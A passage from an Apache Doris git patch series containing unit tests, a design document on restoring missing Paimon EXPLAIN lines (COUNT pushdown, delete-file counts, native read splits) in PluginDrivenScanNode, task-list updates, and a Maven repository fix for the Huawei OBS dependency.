sub-splits and JNI splits -> numerator counts + // ONLY the native ones. Kills a "count all ranges" or "count JNI" mutation. + List rs = ranges( + range(true, -1), range(false, -1), range(true, -1), range(false, -1)); + Assertions.assertEquals(2, PluginDrivenScanNode.countNativeReadRanges(rs)); + Assertions.assertEquals(4, rs.size()); + } + + @Test + public void emptyRangesCountZeroNative() { + Assertions.assertEquals(0, + PluginDrivenScanNode.countNativeReadRanges(Collections.emptyList())); + } + + // ==================== pushdown COUNT(*) sentinel ==================== + + @Test + public void countPushdownPicksUpPrecomputedSum() { + // Append/merge tables: the collapsed count range carries the merged sum (e.g. 12). With count + // pushdown active it is surfaced so EXPLAIN prints "pushdown agg=COUNT (12)". + List rs = ranges(range(false, 12)); + Assertions.assertEquals(12, PluginDrivenScanNode.resolvePushDownRowCount(true, rs)); + } + + @Test + public void countPushdownWithNoCountRangeKeepsMinusOneSentinel() { + // THE sentinel guard: a deletion-vector table emits no precomputed-count range (every range + // returns -1). Even with count pushdown active the result must stay -1 -> "pushdown agg=COUNT + // (-1)" (test_paimon_deletion_vector). A mutation defaulting to 0 makes this red. + List rs = ranges(range(true, -1), range(false, -1)); + Assertions.assertEquals(-1, PluginDrivenScanNode.resolvePushDownRowCount(true, rs)); + } + + @Test + public void noCountPushdownNeverReadsACount() { + // A non-COUNT scan must NOT pick up a stray precomputed count even if a range happens to carry + // one. Pins that the count is gated on countPushdown, not just on the range value. + List rs = ranges(range(false, 99)); + Assertions.assertEquals(-1, PluginDrivenScanNode.resolvePushDownRowCount(false, rs)); + } + + @Test + public void countPushdownReturnsFirstPrecomputedCount() { + // Only ONE collapsed count range is emitted, but guard the "first non-negative wins" contract + // so a leading data range (-1) does not mask the trailing count range's value. + List rs = ranges(range(true, -1), range(false, 8)); + Assertions.assertEquals(8, PluginDrivenScanNode.resolvePushDownRowCount(true, rs)); + } +} diff --git a/plan-doc/fix-e-explain-gap-design.md b/plan-doc/fix-e-explain-gap-design.md new file mode 100644 index 00000000000000..6be1fc6ad9c414 --- /dev/null +++ b/plan-doc/fix-e-explain-gap-design.md @@ -0,0 +1,330 @@ +# Problem + +Build 968994 (branch `catalog-spi-07-paimon`), 5 paimon regression tests fail with +`IllegalStateException: Explain and check failed`. The catalogs load, every `qt_*` +data query passes, and the COUNT values are correct — only the EXPLAIN string is +missing lines that the legacy `org.apache.doris.datasource.paimon.source.PaimonScanNode` +emitted. All 5 assertions are inline `explain { contains "..." }` checks (NOT `.out`-backed). + +| # | test (file:line) | expected `contains` | actual plan has | +|---|---|---|---| +| 1 | `test_paimon_count.groovy:51` | `pushdown agg=COUNT (12)` | `VPluginDrivenScanNode` + a normal `VAGGREGATE count(*)`, NO `pushdown agg` line | +| 2 | `test_paimon_deletion_vector.groovy:54` | `pushdown agg=COUNT (-1)` | same — no `pushdown agg` line | +| 3 | `test_paimon_deletion_vector_oss.groovy:57` (VERBOSE) | `deleteFileNum` | no `dataFileNum/deleteFileNum/deleteSplitNum` block | +| 4 | `test_paimon_catalog_varbinary.groovy:44` (force_jni) | `paimonNativeReadSplits=0/1` | no `paimonNativeReadSplits` line | +| 5 | `test_paimon_catalog_timestamp_tz.groovy:37` (force_jni) | `paimonNativeReadSplits=0/1` | no `paimonNativeReadSplits` line | + +The actual explain bodies (from `/mnt/disk1/yy/tmp/64445_..._external/doris-regression-test.20260613.165803.log`) +show `VPluginDrivenScanNode(NN)` with `TABLE`/`CONNECTOR: paimon`/`partition=0/0` but none of the four +line families above. `count(*)` is served by a regular VAGGREGATE (correct rows; the FE `pushdown agg` +display is just absent). + +These 5 are GENUINELY display-only — see Risk Analysis §"Real regression vs display gap": 4 catalogs are +`hdfs://` filesystem warehouses, the 5th is `oss://` (jindo bundled). None touch the broken s3/obs/hms +packaging classes; the oss test already ran `qt_1..qt_6` reads before the explain assertion, proving its +catalog loads and reads work. + +# Root Cause + +`PluginDrivenScanNode.getNodeExplainString(prefix, detailLevel)` +(`fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java:228-280`) +is a **full override that does NOT call `super.getNodeExplainString`** +(`FileScanNode.getNodeExplainString`, `fe/fe-core/.../datasource/FileScanNode.java:129-245`). +It hand-rolls the `TABLE` / `CONNECTOR` / `QUERY` / `PREDICATES` / `partition=N/M` lines and then +delegates to `scanProvider.appendExplainInfo(output, prefix, props)` (line 264). Because it never calls +super, it silently drops every FileScanNode-produced line. This is the documented +`catalog-spi-plugindriven-explain-override-gap` pattern, now re-manifested for paimon's four extra lines. + +The four missing line families and their legacy producers: + +1. **`pushdown agg=COUNT (n)`** — produced by `FileScanNode.java:227-232`: + ``` + output.append(prefix).append(String.format("pushdown agg=%s", pushDownAggNoGroupingOp)); + if (pushDownAggNoGroupingOp.equals(TPushAggOp.COUNT)) { + output.append(" (").append(getPushDownCount()).append(")"); + } + ``` + `getPushDownCount()` returns the field `tableLevelRowCount` (default `-1`), set only via + `FileScanNode.setPushDownCount(long)` (`:102-104`). Legacy `PaimonScanNode.getSplits` calls + `setPushDownCount(pushDownCountSum)` (`PaimonScanNode.java:492`) when count pushdown produces a sum. + `PluginDrivenScanNode` NEVER calls `setPushDownCount` — it forwards `countPushdown` to the provider + (`:571-574`) but the provider computes `countSum` internally and emits it only per-range via the BE-bound + `paimon.row_count` property (`PaimonScanRange` builder → `formatDesc.setTableLevelRowCount`). The FE + node's `tableLevelRowCount` stays `-1`. So even if super were called, count tables would print `(-1)`. + - Expected `(12)`/`(8)` = real precomputed merged-count sums (append/merge tables); `.out` count + results confirm 12 and 8. + - Expected `(-1)` (deletion_vector tables) = NO precomputed merged count → no count-range emitted → + `tableLevelRowCount` stays `-1` → BE counts by reading; `.out` confirms the query returns 3. + +2. **`dataFileNum=, deleteFileNum=, deleteSplitNum=`** — produced by `FileScanNode.java:209-212`, but + gated `detailLevel == VERBOSE && !isBatchMode()` (`:151`). The per-BE loop calls + `getDeleteFiles(fileRangeDesc)` (`:179`); the base `FileScanNode.getDeleteFiles` returns `emptyList` + (`:123-127`). Legacy `PaimonScanNode` OVERRIDES `getDeleteFiles` (`PaimonScanNode.java:337-357`) to read + `TPaimonFileDesc.getDeletionFile().getPath()` from the thrift range. `PluginDrivenScanNode` does NOT + override `getDeleteFiles`, so even with super, `deleteFileNum` would always be 0. Test #3 uses + `verbose(true)` and just asserts the literal substring `deleteFileNum` exists. + +3. **`paimonNativeReadSplits=/`** — paimon-specific, produced by the legacy override + `PaimonScanNode.getNodeExplainString:656-658`: + ``` + sb.append(String.format("%spaimonNativeReadSplits=%d/%d\n", + prefix, rawFileSplitNum, (paimonSplitNum + rawFileSplitNum))); + ``` + `rawFileSplitNum` (native ORC/Parquet sub-splits) and `paimonSplitNum` (JNI + non-DataSplit + count + splits) are accumulated in `PaimonScanNode.getSplits` (`:393,465,477`). In the SPI path, split + classification (native vs JNI vs count) happens INSIDE `PaimonScanPlanProvider.planScanInternal` + (`PaimonScanPlanProvider.java:288-439`); the node only receives the resulting `List`. + `PaimonScanPlanProvider` has NO `appendExplainInfo` override and tracks no counts. The counts must be + re-derived by the node from the returned ranges. Under `force_jni_scanner=true` (tests #4/#5), the + native arm is never taken → `rawFileSplitNum=0`, exactly one JNI split → `0/1`. + +4. **`predicatesFromPaimon:` / `PaimonSplitStats:`** — also emitted by the legacy override + (`PaimonScanNode.getNodeExplainString:660-687`). NOT asserted by any of the 5 failing tests, so out of + scope (but see Risk §"completeness" — re-emitting them is harmless and improves parity). + +**Ordering note (verified):** `FileQueryScanNode.finalizeForNereids` (`:236`) → `createScanRangeLocations` +(`:312`) → `getSplits(numBackends)` (`:415`) runs during planning, BEFORE explain renders. So the node can +accumulate counts in `getSplits` and read them in `getNodeExplainString`, exactly as legacy does. + +# Design + +The fix re-emits the four line families from `PluginDrivenScanNode`, paimon-gated so other plugin +connectors (es / jdbc / trino-connector / max_compute — `CatalogFactory.SPI_READY_TYPES`) are byte-unchanged. + +Three deltas, all in `PluginDrivenScanNode` plus one tiny SPI seam: + +### Change A — call `super` for the FileScanNode line families, behind a flag + +Do NOT blanket-call `super.getNodeExplainString` (it would also emit `table:`, `inputSplitNum=`, +`numNodes=`, etc., perturbing the existing custom `TABLE`/`CONNECTOR`/`QUERY`/`PREDICATES`/`partition=` +format that maxcompute/es golden assertions match). Instead, **selectively re-emit** the two +FileScanNode line families that are paimon-asserted, keeping the existing custom header: + +- **`pushdown agg=COUNT (n)`**: after the connector `appendExplainInfo` call, emit + ``` + output.append(prefix).append("pushdown agg=").append(getPushDownAggNoGroupingOp()); + if (getPushDownAggNoGroupingOp() == TPushAggOp.COUNT) { + output.append(" (").append(getTableLevelRowCountForExplain()).append(")"); + } + output.append("\n"); + ``` + This line is connector-agnostic and safe to emit for ALL plugin connectors (it mirrors what + FileScanNode prints for every other scan node — its absence on plugin nodes is itself an inconsistency). + **No gating needed** for the `pushdown agg` line; it is universally correct. + - Requires the count value to reach the node. See Change C. + +- **`dataFileNum/deleteFileNum/deleteSplitNum`** (VERBOSE block): this is the expensive per-BE loop in + `FileScanNode:151-213`. Rather than duplicate ~60 lines, factor the VERBOSE per-BE block out of + `FileScanNode.getNodeExplainString` into a `protected` helper + `appendBackendScanRangeDetail(StringBuilder, prefix)` and call it from `PluginDrivenScanNode` under the + same `detailLevel == VERBOSE && !isBatchMode()` gate. (Surgical alternative if extraction is undesirable: + copy the block; but extraction avoids drift and is preferred by Rule 3's "don't fork" reading.) The block + calls `getDeleteFiles(rangeDesc)` — see Change B for the plugin override. + +### Change B — `getDeleteFiles` override on the plugin node, via a generic seam + +`PaimonScanRange.populateRangeParams` already sets `TPaimonFileDesc.setDeletionFile(...)` on the thrift +range from the `paimon.deletion_file.path` property. The deletion-file path is therefore present in the +serialized `TFileRangeDesc` at explain time. Override `getDeleteFiles(TFileRangeDesc rangeDesc)` on +`PluginDrivenScanNode` to read it. + +Two options for keeping it generic (the node is shared): +- **Option B1 (preferred):** add a default SPI hook + `ConnectorScanPlanProvider.getDeleteFiles(TFileRangeDesc) -> List` returning `emptyList()` by + default; `PaimonScanPlanProvider` overrides it to read `TTableFormatFileDesc.getPaimonParams() + .getDeletionFile().getPath()` (a verbatim port of legacy `PaimonScanNode.getDeleteFiles:337-357`). The + node's override delegates to `connector.getScanPlanProvider().getDeleteFiles(rangeDesc)`. This keeps the + thrift-shape knowledge in the paimon connector and leaves es/jdbc/mc returning empty (no `deleteFileNum` + change — though their VERBOSE block still won't print unless they also opt in, see gating below). +- **Option B2 (rejected):** read `TPaimonFileDesc` directly in fe-core's `PluginDrivenScanNode`. Rejected: + bakes paimon thrift knowledge into the shared node, and the legacy fe-core PaimonScanNode already imports + `TPaimonDeletionFileDesc`/`TPaimonFileDesc` so the precedent exists, but B1 is cleaner for the SPI. + +### Change C — thread the count-pushdown sum back to the node + +`PaimonScanPlanProvider` already encodes the summed count on the single collapsed count range as the +`paimon.row_count` property (`PaimonScanRange` builder `.rowCount(...)` → `props["paimon.row_count"]`, +consumed BE-side by `populateRangeParams:202-205`). In `PluginDrivenScanNode.getSplits`, after building the +`PluginDrivenSplit`s, scan the ranges and, if `countPushdown` is active, read `paimon.row_count` from the +range properties and call `setPushDownCount(sum)`. Generic implementation (no paimon import): +``` +if (countPushdown) { + for (ConnectorScanRange r : ranges) { + String rc = r.getProperties().get("paimon.row_count"); // generic key lookup + if (rc != null) { setPushDownCount(Long.parseLong(rc)); break; } + } +} +``` +For deletion_vector tables no count range is emitted → no `paimon.row_count` → `tableLevelRowCount` stays +`-1` → `pushdown agg=COUNT (-1)`. Correct. + +The property key `paimon.row_count` is paimon-specific but harmless to look up generically (absent for +other connectors). To avoid hard-coding a paimon key in the shared node, optionally promote it to a generic +`ConnectorScanRange` getter `getPushDownRowCount() -> long (default -1)` that `PaimonScanRange` overrides +from its `rowCount` field; the node reads `r.getPushDownRowCount()`. **Preferred:** the generic getter, to +keep the shared node connector-agnostic (consistent with Rule 11). + +### Change D — accumulate native/jni split counts and emit `paimonNativeReadSplits` + +`paimonNativeReadSplits` is intrinsically paimon-specific. Emit it from the connector via a NEW +`appendExplainInfo` override on `PaimonScanPlanProvider` — BUT `appendExplainInfo` only receives the +`nodeProperties` map, NOT the per-scan split counts (those are computed in `planScan`, after +`getScanNodeProperties`). So the counts must be threaded through the node. + +Chosen approach: classify ranges in `PluginDrivenScanNode.getSplits` (where ranges are already iterated) +and stash counts, then emit via the connector's `appendExplainInfo` by passing them through a small +augmented props map, OR — simpler and matching legacy — have the connector own the string but feed it the +counts. Concretely: + +- A native range = `ConnectorScanRange` whose `getRangeType()` is `FILE_SCAN` with a `getPath()` present + and NO `paimon.split` property (paimon native sub-splits set `path`/`fileFormat`, no `paimon.split`). +- A jni/count range = has the `paimon.split` property. + +Cleanest generic seam: add `ConnectorScanRange.isNativeReadRange() -> boolean (default false)` that +`PaimonScanRange` overrides (`true` when `paimon.split == null && path != null`). In +`PluginDrivenScanNode.getSplits`, after building splits, compute +`nativeCount = count(isNativeReadRange)` and `totalCount = ranges.size()`, store in two node fields +(`int rawFileSplitNum`, `int totalSplitNum` — generic names; or a single `scanRangeReadStats` map). Then in +`getNodeExplainString`, pass these to the connector via `appendExplainInfo`. Since `appendExplainInfo`'s +signature is `(StringBuilder, String prefix, Map nodeProperties)`, thread the counts by +**adding them into a copy of the props map** the node passes to `appendExplainInfo` (e.g. +`__native_read_splits` / `__total_read_splits` synthetic keys), and have `PaimonScanPlanProvider +.appendExplainInfo` read them and emit `paimonNativeReadSplits=raw/total`. This keeps the paimon string in +the paimon connector and needs no SPI signature change. + +**Gating:** `appendExplainInfo` is already connector-dispatched (only the active connector's provider runs), +so `paimonNativeReadSplits` is emitted ONLY for paimon. es/jdbc/mc providers do not emit it. The +synthetic count keys are injected by the shared node for ALL connectors but consumed only by paimon's +override — no other connector reads them, no perturbation. + +**Summary of emission sites:** +| line | emitted in | gating | +|---|---|---| +| `pushdown agg=COUNT (n)` | `PluginDrivenScanNode.getNodeExplainString` (new) | none — universally correct | +| `dataFileNum/deleteFileNum/deleteSplitNum` | `PluginDrivenScanNode.getNodeExplainString` via extracted `FileScanNode` helper, VERBOSE-gated; `getDeleteFiles` via SPI | VERBOSE level; non-paimon return empty delete list | +| `paimonNativeReadSplits=raw/total` | `PaimonScanPlanProvider.appendExplainInfo` (new) | connector-dispatched (paimon only) | +| count sum (`-1` default) | node field `tableLevelRowCount` set in `getSplits` from `ConnectorScanRange.getPushDownRowCount()` | only set when a count range carries it | +| native/total split counts | node fields set in `getSplits` from `ConnectorScanRange.isNativeReadRange()` | generic; consumed only by paimon's appendExplainInfo | + +# Implementation Plan + +1. **SPI (`fe-connector-api/.../scan/ConnectorScanRange.java`)**: add two default methods: + `default long getPushDownRowCount() { return -1; }` and + `default boolean isNativeReadRange() { return false; }`. +2. **SPI (`ConnectorScanPlanProvider.java`)**: (Option B1) add + `default List getDeleteFiles(TTableFormatFileDesc tableFormatParams) { return emptyList(); }`. +3. **`PaimonScanRange.java`**: override `getPushDownRowCount()` (return the `rowCount` field, else -1) and + `isNativeReadRange()` (`paimonSplit == null && path != null`). +4. **`PaimonScanPlanProvider.java`**: + - override `appendExplainInfo(output, prefix, props)`: read the two synthetic count keys the node + injects and emit `paimonNativeReadSplits=/`; optionally also re-emit + `predicatesFromPaimon:` (needs predicates — already serialized in `paimon.predicate`, decode or + skip — out of scope for the 5 tests). + - override `getDeleteFiles(TTableFormatFileDesc)`: verbatim port of legacy + `PaimonScanNode.getDeleteFiles` reading `getPaimonParams().getDeletionFile().getPath()`. +5. **`FileScanNode.java`**: extract lines 151-213 (the `VERBOSE && !isBatch` per-BE block) into + `protected void appendBackendScanRangeDetail(StringBuilder output, String prefix)`; call it from the + existing `getNodeExplainString` (no behavior change for existing FileScanNode subclasses). +6. **`PluginDrivenScanNode.java`**: + - add fields `private long pushDownRowCount = -1; private int nativeReadSplitNum; private int totalReadSplitNum;` + (or reuse `setPushDownCount`). + - in `getSplits` (after building `splits`): if `countPushdown`, set `setPushDownCount(firstRowCount)`; + accumulate `nativeReadSplitNum`/`totalReadSplitNum` from `range.isNativeReadRange()`. + - override `protected List getDeleteFiles(TFileRangeDesc rangeDesc)`: delegate to + `connector.getScanPlanProvider().getDeleteFiles(rangeDesc.getTableFormatParams())` (null-guarded). + - in `getNodeExplainString` (after `appendExplainInfo`, inside the non-PassthroughQueryTableHandle + branch): inject `__native_read_splits`/`__total_read_splits` into the props passed to + `appendExplainInfo`; emit the `pushdown agg=...` line; under `VERBOSE && !isBatchMode()` call + `appendBackendScanRangeDetail`. + - **Ordering of the injected counts:** `appendExplainInfo` runs inside `getNodeExplainString`, after + `getSplits` already ran (finalize order verified), so the count fields are populated. + +# Risk Analysis + +- **Shared-node perturbation (PRIMARY risk).** `PluginDrivenScanNode` is shared by jdbc/es/trino/max_compute. + - `pushdown agg=COUNT (n)`: added for ALL plugin connectors. Verified no other connector's suite uses + `checkNotContains "pushdown agg"`; the maxcompute partition-prune suite + (`external_table_p2/maxcompute/test_max_compute_partition_prune.groovy`) only does positive + `contains "partition=N/M"` / `contains "CONNECTOR: max_compute"` — additive lines don't break `contains`. + No `.out` file captures a `VPluginDrivenScanNode` block (grep: zero hits across `regression-test/data/`), + so no golden explain shifts. + - VERBOSE `deleteFileNum` block: emitted only at VERBOSE for plugin nodes that opt into the helper. Other + connectors' `getDeleteFiles` returns empty → `deleteFileNum=0` if their VERBOSE block prints. To be + conservative, the VERBOSE block can be gated to paimon (`getCatalog().getType().equals("paimon")` — + available at `PluginDrivenScanNode.java:244`) so es/jdbc/mc VERBOSE output is byte-unchanged. **Decision: + gate the VERBOSE block to paimon** to minimize blast radius (the 3 paimon assertions are the only + consumers; the `pushdown agg` line stays ungated since it is universally correct and already standard + for every FileScanNode). + - `paimonNativeReadSplits`: connector-dispatched via `appendExplainInfo`, paimon-only by construction. +- **Value correctness (genOut risk).** CI dumped values in genOut. Verification: the `.out` count results + (`test_paimon_count.out`: append=12, merge_on_read=8, deletion_vector=3) cross-check the explain values — + `(12)`/`(8)` equal the actual counts (pushdown happened); `(-1)` is the no-precomputed-count sentinel and + the dv table still returns 3 by BE counting. `paimonNativeReadSplits=0/1` is asserted under + `force_jni_scanner=true`, where the native arm is provably skipped (`shouldUseNativeReader` returns false + when `force_jni_scanner` is set) → 0 native, 1 jni. These are semantic, not just text. See Test Plan for + the comparison-mode reruns that turn genOut into a real check. +- **Real regression vs display gap (per the brief's question).** All 5 are PURE DISPLAY gaps, NOT read-path + regressions: + - #1/#2 count: the data query (`qt_*_count`) returns the correct count via a normal VAGGREGATE; only the + FE `pushdown agg` display line is absent. The count-pushdown OPTIMIZATION still happens BE-side + (`paimon.row_count` is emitted on the range and consumed by `populateRangeParams`); FE just doesn't + render it. (If the optimization were broken, the data result would still be correct — so the explain + line is the only signal; the comparison-mode rerun in Test Plan confirms the BE row-count path.) + - #4/#5 `paimonNativeReadSplits=0/1`: with `force_jni_scanner=true` the reader-selection is correct + (everything JNI); the count is simply not displayed. The `qt_*` reads pass. + - #3 `deleteFileNum`: the deletion vector is correctly applied BE-side (the merge-on-read `qt_*` results + pass); only the VERBOSE accounting line is missing. The deletion file IS threaded to BE + (`paimon.deletion_file.path` → `setDeletionFile`), just not surfaced in FE explain. + Conclusion: NONE of the 5 hides a real read-path regression. They are all the + `plugindriven-explain-override-gap` (no-super) class. +- **oss catalog load risk.** `test_paimon_deletion_vector_oss` uses `oss://` + `oss.endpoint`/`oss.access_key` + (jindo, bundled per `e881247857d` FIX-PAIMON-OSS-JINDO-SELFCONTAINED). The test ran `qt_1..qt_6` before the + explain assertion, so the catalog loaded and the oss reads succeeded — the explain gap is the only failure. +- **FileScanNode helper extraction.** Refactoring lines 151-213 into a protected method changes no behavior + for existing FileScanNode subclasses (Hive/Iceberg/Hudi/Tvf) — it is a pure extract-method. Verify by + running the iceberg/hive explain suites that assert `pushdown agg` (1 iceberg + 1 hive suite found). + +# Test Plan + +## Unit Tests + +New `fe-core` tests on `PluginDrivenScanNode` (Mockito, same infra as +`PluginDrivenScanNodePartitionCountTest`): +- `getNodeExplainString` with `pushDownAggNoGroupingOp = COUNT` and `setPushDownCount(12)` → output + contains `pushdown agg=COUNT (12)`; with no count set → `pushdown agg=COUNT (-1)`. +- count accumulation: feed a fake `ConnectorScanRange` list where one range has + `getPushDownRowCount()=12` under `countPushdown=true` → node's `tableLevelRowCount` == 12; with none → + stays -1. (Encodes WHY: the -1 sentinel must survive when no count range exists — Rule 9.) +- native/total accumulation: ranges with `isNativeReadRange()` mixed true/false → fields equal the counts; + all-jni (force_jni) → native=0, total=N. +- `getDeleteFiles` override delegates to the provider and returns the deletion path when + `TPaimonFileDesc.getDeletionFile()` is set; empty when unset. +- VERBOSE gating: assert the `dataFileNum/deleteFileNum/deleteSplitNum` block appears for a paimon-typed + catalog at VERBOSE and NOT for a non-paimon-typed catalog (locks the gating decision). + +New `fe-connector-paimon` tests on `PaimonScanPlanProvider` (offline, `PaimonScanPlanProviderTest` infra): +- `appendExplainInfo` with synthetic `__native_read_splits=0`/`__total_read_splits=1` → emits + `paimonNativeReadSplits=0/1`. +- `getDeleteFiles(TTableFormatFileDesc)` returns the deletion path (port of legacy + `PaimonScanNodeTest` deletion-file assertions if present). +- `PaimonScanRange.getPushDownRowCount()`/`isNativeReadRange()` for builder permutations + (paimonSplit set vs path set; rowCount set vs not). + +Run: `mvn -pl fe-core,fe-connector/fe-connector-paimon -am test` (use absolute `-f`; include `-am` to avoid +the `${revision}` resolution false error per memory `doris-build-verify-gotchas`). Checkstyle binds to the +fe-core test build — keep new tests clean. + +## E2E Tests + +Docker regression (paimon suite is `enablePaimonTest=true`-gated; NOT run locally in this design): +- Re-run the 5 suites in COMPARISON mode (not genOut) so the inline `explain { contains ... }` asserts the + re-emitted lines AND the `qt_*`/`order_qt_*` data results compare against the committed `.out`: + `test_paimon_count`, `test_paimon_deletion_vector`, `test_paimon_deletion_vector_oss`, + `test_paimon_catalog_varbinary`, `test_paimon_catalog_timestamp_tz`. + - This is the VALUE-VERIFICATION step: the `.out` count rows (12/8/3) confirm count pushdown correctness, + independent of the explain text — turning the genOut dump into a real check. +- Regression-guard the shared node: re-run the maxcompute partition-prune suite + (`external_table_p2/maxcompute/test_max_compute_partition_prune`) and any es/jdbc explain suites to + confirm `partition=N/M` / `CONNECTOR:` assertions still pass and no stray paimon lines appear. +- Run the iceberg + hive suites that assert `pushdown agg` to confirm the `FileScanNode` extract-method is + behavior-neutral. diff --git a/plan-doc/task-list.md b/plan-doc/task-list.md index e465b011ec5845..c8553c3bef4d45 100644 --- a/plan-doc/task-list.md +++ b/plan-doc/task-list.md @@ -5,8 +5,8 @@ commits are internally incomplete + one SPI explain-gap regression. F (hive_ctas - [x] FIX-A — bundle s3-transfer-manager (Class A: s3 FileIO/AWS SDK interceptor skew; 6 direct + 18 collateral) — `75496c94e36` - [x] FIX-B — bundle hadoop-huaweicloud (Class B: obs cross-loader cast; paimon_base_filesystem) — `3c7adfe1de1` -- [ ] FIX-C — paimon-hive-shade module, relocate thrift (Class C: TFramedTransport NoClassDefFound; 2 tests) — design: fix-c-hms-thrift-design.md -- [ ] FIX-E — PluginDrivenScanNode/PaimonScanPlanProvider explain emission (Class E: 5 explain-mismatch) — design: fix-e-explain-gap-design.md +- [x] FIX-C — paimon-hive-shade module, relocate thrift (Class C: TFramedTransport NoClassDefFound; 2 tests) — `5ac8c302596` +- [x] FIX-E — PluginDrivenScanNode/PaimonScanPlanProvider explain emission (Class E: 5 explain-mismatch) — `` Excluded: - F — external_table_p0.hive.write.test_hive_ctas_to_doris: pre-existing stale test (auto-partition-name From af67643ef6a672b66453b51252146c307b770f98 Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 13 Jun 2026 21:14:33 +0800 Subject: [PATCH 060/128] docs: mark FIX-E done in task-list (CI 968994) Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/task-list.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/plan-doc/task-list.md b/plan-doc/task-list.md index c8553c3bef4d45..2eeca2f41ca183 100644 --- a/plan-doc/task-list.md +++ b/plan-doc/task-list.md @@ -6,7 +6,7 @@ commits are internally incomplete + one SPI explain-gap regression. F (hive_ctas - [x] FIX-A — bundle s3-transfer-manager (Class A: s3 FileIO/AWS SDK interceptor skew; 6 direct + 18 collateral) — `75496c94e36` - [x] FIX-B — bundle hadoop-huaweicloud (Class B: obs cross-loader cast; paimon_base_filesystem) — `3c7adfe1de1` - [x] FIX-C — paimon-hive-shade module, relocate thrift (Class C: TFramedTransport NoClassDefFound; 2 tests) — `5ac8c302596` -- [x] FIX-E — PluginDrivenScanNode/PaimonScanPlanProvider explain emission (Class E: 5 explain-mismatch) — `` +- [x] FIX-E — PluginDrivenScanNode/PaimonScanPlanProvider explain emission (Class E: 5 explain-mismatch) — `d4526013364` Excluded: - F — external_table_p0.hive.write.test_hive_ctas_to_doris: pre-existing stale test (auto-partition-name From 123938d3f253c1d68316420cd57a84d09bb6fcd3 Mon Sep 17 00:00:00 2001 From: morningman Date: Sun, 14 Jun 2026 05:24:50 +0800 Subject: [PATCH 061/128] =?UTF-8?q?fix:=20FIX-PAIMON-OBS-REPO=20=E2=80=94?= =?UTF-8?q?=20declare=20huawei-obs-sdk=20repo=20so=20the=20connector=20bui?= =?UTF-8?q?ld=20resolves=20hadoop-huaweicloud=20(CI=20968994)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - FIX-PAIMON-OBS-SELFCONTAINED (3c7adfe1de1) added a com.huaweicloud:hadoop-huaweicloud dep to fe-connector-paimon, but that artifact (3.1.1-hw-46) is NOT in Maven Central / the Apache repos. fe-core resolves it via a id=huawei-obs-sdk it declares locally; the connector module does not inherit it (fe-connector / fe declare no repositories), so a clean-env FE build failed: 'hadoop-huaweicloud:jar:3.1.1-hw-46 was not found in https://repo.maven.apache.org/maven2'. (My earlier local build only passed because the jar was already cached in ~/.m2 from a full FE build.) - fix: declare the huawei-obs-sdk repository (https://repo.huaweicloud.com/repository/maven/huaweicloudsdk/) in fe-connector-paimon/pom.xml, mirroring fe-core; and scope the dep 'runtime' (mirrors fe-core — OBSFileSystem is loaded reflectively via the Hadoop FileSystem SPI, not referenced at compile time; plugin-zip.xml still bundles the runtime closure). - verified: removed hadoop-huaweicloud from ~/.m2, rebuilt non-offline -> re-fetched from huawei-obs-sdk (_remote.repositories), plugin zip still bundles hadoop-huaweicloud-3.1.1-hw-46.jar. Repo serves the jar (HTTP 200). Local mirror is mirrorOf=central, so the huawei repo is reached directly (as in CI). Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-paimon/pom.xml | 24 +++++++++++++++++---- 1 file changed, 20 insertions(+), 4 deletions(-) diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index 122d3696cda851..b7778961b553c6 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -118,13 +118,17 @@ under the License. from the parent 'app' loader while FileSystem resolved from the child ChildFirstClassLoader, so FileSystem.createFileSystem's cast threw "OBSFileSystem cannot be cast to FileSystem" (FIX-PAIMON-OBS-SELFCONTAINED, CI 968994 paimon_base_filesystem). Bundling it child-first - co-locates OBSFileSystem with the plugin's own FileSystem so the cast succeeds. Version + scope - (compile) + jackson-databind exclusion inherited from fe-core dependencyManagement - (${huaweiobs.version}); the esdk-obs SDK rides transitively. hadoop-common stays the plugin's - own direct (depth-1) copy via Maven mediation, so no duplicate FileSystem is introduced. --> + co-locates OBSFileSystem with the plugin's own FileSystem so the cast succeeds. runtime scope + (mirrors fe-core: OBSFileSystem is loaded reflectively via the Hadoop FileSystem SPI, not + referenced at compile time) — still bundled by plugin-zip.xml, which packs the runtime closure. + The -hw-46 jar is a fat jar self-containing the esdk-obs SDK (com/obs/*); hadoop-common stays the + plugin's own direct (depth-1) copy via Maven mediation, so no duplicate FileSystem is introduced. + NOTE: the -hw-46 artifact is NOT in Maven Central — it lives in the huawei-obs-sdk repo declared + in below (fe-core declares the same repo for the same dep). --> com.huaweicloud hadoop-huaweicloud + runtime + + + huawei-obs-sdk + https://repo.huaweicloud.com/repository/maven/huaweicloudsdk/ + + + doris-fe-connector-paimon From 321e6c4b0526a667ddecc45d157a9f2b38ffa1fe Mon Sep 17 00:00:00 2001 From: morningman Date: Sun, 14 Jun 2026 05:40:03 +0800 Subject: [PATCH 062/128] =?UTF-8?q?test:=20fix=20PaimonMetadataOpsTest=20?= =?UTF-8?q?=E2=80=94=20build=20legacy=20catalog=20directly,=20not=20via=20?= =?UTF-8?q?SPI-routed=20CatalogFactory=20(CI=20968994)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - PaimonMetadataOpsTest.beforeClass failed with 'No connector plugin loaded for catalog type paimon'. Pre-existing breakage (NOT from the CI-968994 packaging/explain fixes): 'paimon' was added to CatalogFactory.SPI_READY_TYPES by the SPI-framework cutover (5c325655b8b), so CatalogFactory.createFromCommand('paimon', ...) now routes through the connector-plugin SPI and returns a PluginDrivenExternalCatalog — it throws when no plugin is installed in connector_plugin_root (the case in a plain fe-core UT), and even when loaded is not castable to the legacy (PaimonExternalCatalog) the test cast to. Either way beforeClass aborted the class. - fix: the test exercises the still-live legacy PaimonMetadataOps, so construct the legacy filesystem catalog directly (new PaimonFileExternalCatalog(...) + makeSureInitialized()) instead of through the SPI-routed factory (mirrors ExternalMetaCacheRouteResolverTest which constructs new PaimonExternalCatalog(...) directly). Dropped the now-unused CatalogFactory/CreateCatalogCommand imports. No production change. - 